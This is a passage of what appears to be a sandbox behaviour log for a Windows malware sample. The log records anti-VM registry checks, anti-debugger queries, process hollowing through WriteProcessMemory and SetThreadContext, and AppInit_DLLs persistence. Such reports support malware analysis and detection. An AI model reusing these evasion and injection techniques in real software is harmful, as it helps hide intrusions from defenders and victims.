C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects\WT8AYZWL BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects\WT8AYZWL BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects\WT8AYZWL BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
File Path Disposition Data Ascii Data Completion Count Source Address Symbol

Section Activities

File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 260000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 280000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2D0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 320000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\KnownDlls\WS2_32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\WS2HELP.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\Normaliz.dll write and read and execute unknown 330000 36864 own pid read write conflicting addresses 1
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 350000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 360000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 360000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 920000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 390000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 390000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 390000 4096 own pid readonly success or wait 1
unknown query and write and read commit 3B0000 16384 own pid read write success or wait 1
unknown query and write and read commit 3B0000 16384 own pid read write success or wait 1
unknown query and write and read commit 3B0000 16384 own pid read write success or wait 1
unknown query and write and read commit 3B0000 16384 own pid read write success or wait 1
unknown query and write and read commit 3B0000 16384 own pid read write success or wait 1
unknown query and write and read commit 3B0000 16384 own pid read write success or wait 1
unknown query and write and read commit 3B0000 16384 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
C:\WINDOWS\system32\shell32.dll read commit B20000 8462336 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit B20000 618496 own pid readonly success or wait 1
\BaseNamedObjects\Local\C:_Documents and Settings_Administrator_Local Settings_Temporary Internet Files_Content.IE5_index.dat_32768 write unknown 3E0000 32768 own pid read write success or wait 1
\BaseNamedObjects\Local\C:_Documents and Settings_Administrator_Cookies_index.dat_16384 write unknown 3F0000 16384 own pid read write success or wait 1
\BaseNamedObjects\Local\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_index.dat_32768 write unknown B20000 32768 own pid read write success or wait 1
\KnownDlls\RASAPI32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\rasapi32.dll query and write and read and execute image 76EE0000 245760 own pid read write success or wait 1
\KnownDlls\rasman.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\rasman.dll query and write and read and execute image 76E90000 73728 own pid read write success or wait 1
\KnownDlls\NETAPI32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\netapi32.dll query and write and read and execute image 5B860000 348160 own pid read write success or wait 1
\KnownDlls\TAPI32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\tapi32.dll query and write and read and execute image 76EB0000 192512 own pid read write success or wait 1
\KnownDlls\rtutils.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\rtutils.dll query and write and read and execute image 76E80000 57344 own pid read write success or wait 1
\KnownDlls\WINMM.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
C:\WINDOWS\system32\tapi32.dll read commit DB0000 184320 own pid readonly success or wait 1
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\KnownDlls\msapsspc.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msapsspc.dll query and write and read and execute image 71E50000 86016 own pid read write success or wait 1
\KnownDlls\MSVCRT40.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msvcrt40.dll query and write and read and execute image 78080000 69632 own pid read write success or wait 1
\KnownDlls\schannel.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\schannel.dll query and write and read and execute image 767F0000 163840 own pid read write success or wait 1
\KnownDlls\CRYPT32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1
\KnownDlls\MSASN1.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1
\KnownDlls\digest.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\digest.dll query and write and read and execute image 75B00000 86016 own pid read write success or wait 1
\KnownDlls\msnsspc.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msnsspc.dll query and write and read and execute image 747B0000 290816 own pid read write success or wait 1
\KnownDlls\MSVCRT40.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msvcrt40.dll query and write and read and execute image 78080000 69632 own pid read write success or wait 1
\KnownDlls\sensapi.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\sensapi.dll query and write and read and execute image 722B0000 20480 own pid read write success or wait 1
C:\WINDOWS\system32\msv1_0.dll write and read and execute commit DB0000 139264 own pid execute success or wait 1
C:\WINDOWS\system32\msv1_0.dll query and write and read and execute image 77C70000 151552 own pid read write success or wait 1
\KnownDlls\cryptdll.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\cryptdll.dll query and write and read and execute image 76790000 49152 own pid read write success or wait 1
\KnownDlls\iphlpapi.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\iphlpapi.dll query and write and read and execute image 76D60000 102400 own pid read write success or wait 1
\BaseNamedObjects\SENS Information Cache read unknown DC0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\mswsock.dll write and read and execute commit EF0000 245760 own pid execute success or wait 1
C:\WINDOWS\system32\mswsock.dll query and write and read and execute image 71A50000 258048 own pid read write success or wait 1
\KnownDlls\hnetcfg.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\hnetcfg.dll query and write and read and execute image 662B0000 360448 own pid read write success or wait 1
C:\WINDOWS\system32\wshtcpip.dll write and read and execute commit DD0000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\wshtcpip.dll query and write and read and execute image 71A90000 32768 own pid read write success or wait 1
\KnownDlls\DNSAPI.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\dnsapi.dll query and write and read and execute image 76F20000 159744 own pid read write success or wait 1
C:\WINDOWS\system32\winrnr.dll write and read and execute commit DD0000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\winrnr.dll query and write and read and execute image 76FB0000 32768 own pid read write success or wait 1
\KnownDlls\WLDAP32.dll write and read and execute unknown 76F60000 180224 own pid read write success or wait 1
\KnownDlls\rasadhlp.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\rasadhlp.dll query and write and read and execute image 76FC0000 24576 own pid read write success or wait 1
C:\vm_tricks_sample.exe query and write and read and execute and extend size image 76FC0000 24576 own pid read write success or wait 1
\BaseNamedObjects\ShimSharedMemory write unknown FF0000 57344 own pid read write success or wait 1
C:\vm_tricks_sample.exe query and read commit 1000000 196608 own pid readonly success or wait 1

Registry Activities

Key Path Key Value Name Completion Count Source Address Symbol
Key Path Name Type Old Data New Data Completion Count Source Address Symbol
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager PendingFileRenameOperations unicode array 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 00 00 success or wait 1 414A20 MoveFileExA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager PendingFileRenameOperations unicode array 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 
00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 4F 00 43 00 55 00 4D 00 45 00 7E 00 31 00 5C 00 41 00 44 00 4D 00 49 00 4E 00 49 00 7E 00 31 00 5C 00 4C 00 4F 00 43 00 41 00 4C 00 53 00 7E 00 31 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 00 00 00 00 00 00 success or wait 1 414A20 MoveFileExA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager PendingFileRenameOperations unicode array 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 4F 00 43 00 55 00 4D 00 45 00 7E 00 31 00 5C 00 41 00 44 00 4D 00 49 00 4E 00 49 00 7E 00 31 00 5C 00 4C 00 4F 00 43 00 41 00 4C 00 53 00 7E 00 31 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 00 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 
00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 4F 00 43 00 55 00 4D 00 45 00 7E 00 31 00 5C 00 41 00 44 00 4D 00 49 00 4E 00 49 00 7E 00 31 00 5C 00 4C 00 4F 00 43 00 41 00 4C 00 53 00 7E 00 31 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 57 00 45 00 42 00 5C 00 00 00 00 00 00 00 success or wait 1 414A20 MoveFileExA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows AppInit_DLLs unicode C:\WINDOWS\mssys.dll success or wait 1 414A9C RegSetValueExA
Key Path Name Completion Count Source Address Symbol
HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Identifier buffer overflow 4 4137DC RegQueryValueExA
HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Identifier success or wait 4 4137DC RegQueryValueExA
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System SystemBiosVersion success or wait 1 4137DC RegQueryValueExA

Mutex Activities

Name Completion Count Source Address Symbol

Process Activities

PID Filepath Cmdline Flags Completion Count Source Address Symbol
1764 C:\vm_tricks_sample.exe C:\vm_tricks_sample.exe none success or wait 1 4144EC CreateProcessA
PID Path Process info class Completion Count Source Address Symbol
484 C:\vm_tricks_sample.exe DebugPort success or wait 2 41226C CheckRemoteDebuggerPresent
484 C:\vm_tricks_sample.exe DebugObjectHandle port not set 1 412221 NtQueryInformationProcess
484 C:\vm_tricks_sample.exe DebugFlags success or wait 1 412238 NtQueryInformationProcess
PID Filepath Completion Count Source Address Symbol
484 C:\vm_tricks_sample.exe success or wait 1 416333 ExitProcess

Thread Activities

TID PID EIP EAX (Usermode EIP) Filepath Completion Count Source Address Symbol
384 484 7C8106F9 414DC0 C:\vm_tricks_sample.exe success or wait 1 414B7C CreateThread
2032 484 7C8106F9 413ED0 C:\vm_tricks_sample.exe success or wait 1 414B7C CreateThread
728 484 7C8106F9 4153C0 C:\vm_tricks_sample.exe success or wait 1 414B7C CreateThread
TID PID DR0 DR1 DR2 DR3 DR7 EFLAGs EIP Completion Count Source Address Symbol
1520 1764 0 0 0 0 0 0 0 success or wait 1 41456C SetThreadContext
TID PID Path Completion Count Source Address Symbol
1520 1764 C:\vm_tricks_sample.exe success or wait 1 414588 ResumeThread
TID Delay Completion Count Source Address Symbol
728 -120s user apc 1 414198 Sleep
TID PID Completion Count Source Address Symbol

Memory Activities

PID Filepath Base Length Value Completion Count Source Address Symbol
PID Filepath Base Length Value Completion Count Source Address Symbol
1764 C:\vm_tricks_sample.exe 400000 4096 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 BA 10 00 0E 1F B4 09 CD 21 B8 01 4C CD 21 90 90 54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73 74 20 62 65 20 72 75 6E 20 75 6E 64 65 72 20 57 69 6E 33 32 0D 0A 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 1 414548 WriteProcessMemory
1764 C:\vm_tricks_sample.exe 426000 73216 2E 66 FE FF 04 10 40 00 03 07 42 6F 6F 6C 65 61 6E 01 00 04 15 FF DD F6 FF 05 46 61 6C 73 65 04 54 72 75 65 8D 0D 2C 11 01 07 49 6E 74 65 67 65 72 FE BB 6F BB 04 21 80 FF 00 7F 8B C0 44 17 0A 06 53 74 72 69 6E 67 98 EF BD 41 E6 0B 00 1F 3A 0B 4D D3 74 CB 14 39 20 03 24 28 1C A0 EE BF 69 96 36 BC F8 07 54 4F 62 6A 65 63 74 A4 33 DB 6D D9 B0 07 0C 60 71 79 73 8A 6D 64 FF DD 6D 08 C4 12 0F 0A 49 98 72 66 61 63 65 C1 DB 41 CE BE 00 C0 2D 46 03 00 B2 CC 4F 32 D9 FF 83 44 24 04 F8 E9 11 00 49 64 09 8C A0 CC CC 21 9B FD BA F1 50 FB FE 11 40 48 4B 76 0D 41 BA 11 17 08 17 8C 0E 1D 11 C8 DD B7 C2 F7 1F 0C F3 4C 10 40 2F 79 C9 E5 3C 59 48 59 58 59 11 54 FD 85 D9 64 C6 64 F0 5F FF 25 B8 E1 42 00 20 83 0C F2 07 B4 B0 AC 83 0C 32 C8 A8 A4 A0 9C 0C 32 C8 20 98 94 90 32 success or wait 1 414548 WriteProcessMemory
1764 C:\vm_tricks_sample.exe 438000 1024 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 02 00 06 00 00 00 20 00 00 80 0A 00 00 00 80 01 00 80 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 07 00 FA 0F 00 00 68 00 00 80 FB 0F 00 00 90 00 00 80 FC 0F 00 00 B8 00 00 80 FD 0F 00 00 E0 00 00 80 FE 0F 00 00 08 01 00 80 FF 0F 00 00 30 01 00 80 00 10 00 00 58 01 00 80 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 01 00 00 00 00 00 80 00 00 00 18 42 03 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 01 00 00 00 00 00 A8 00 00 00 70 44 03 00 54 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 01 00 00 00 00 00 D0 00 00 00 C4 46 03 00 EC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 CA BC 6F 3F 00 00 00 00 00 00 01 00 00 00 00 00 F8 00 00 00 B0 47 03 00 98 01 00 success or wait 1 414548 WriteProcessMemory
1764 C:\vm_tricks_sample.exe 7FFDC008 4 00 00 40 00 success or wait 1 414548 WriteProcessMemory
PID Filepath Base Length Protection Completion Count Source Address Symbol
1764 C:\vm_tricks_sample.exe 400000 12FAB0 page read and write success or wait 1 414518 VirtualAllocEx
PID Filepath Base Length New Protection Old Protection Completion Count Source Address Symbol
Time Private Usage (mb) Workingset (mb) Page File Usage (mb)
09:39:50 0 2 0
09:39:51 1 4 1
09:39:52 1 4 1

System Activities

System info class Completion Count Source Address Symbol
ProcessInformation success or wait 7 4136BC CreateToolhelp32Snapshot

Timing Activities

Time Completion Count Source Address Symbol
Chronological Activities
Operation Data Completion Time
System info queried Type: ProcessInformation success or wait 536601344
System info queried Type: ProcessInformation success or wait 536726623
Key value queried Path: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Name: Identifier buffer overflow 536848217
Key value queried Path: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Name: Identifier success or wait 536849452
Key value queried Path: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Name: Identifier buffer overflow 536850048
Key value queried Path: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Name: Identifier success or wait 536850608
System info queried Type: ProcessInformation success or wait 536854019
System info queried Type: ProcessInformation success or wait 536981284
Key value queried Path: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Name: Identifier buffer overflow 537108471
Key value queried Path: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Name: Identifier success or wait 537110402
Key value queried Path: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Name: Identifier buffer overflow 537111690
Key value queried Path: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 Name: Identifier success or wait 537112257
Key value queried Path: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System Name: SystemBiosVersion success or wait 537113815
System info queried Type: ProcessInformation success or wait 537117734
System info queried Type: ProcessInformation success or wait 537241554
System info queried Type: ProcessInformation success or wait 537359156
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data Disposition: BothDirectoryInformation Filemask: <.exe no such file 537492953
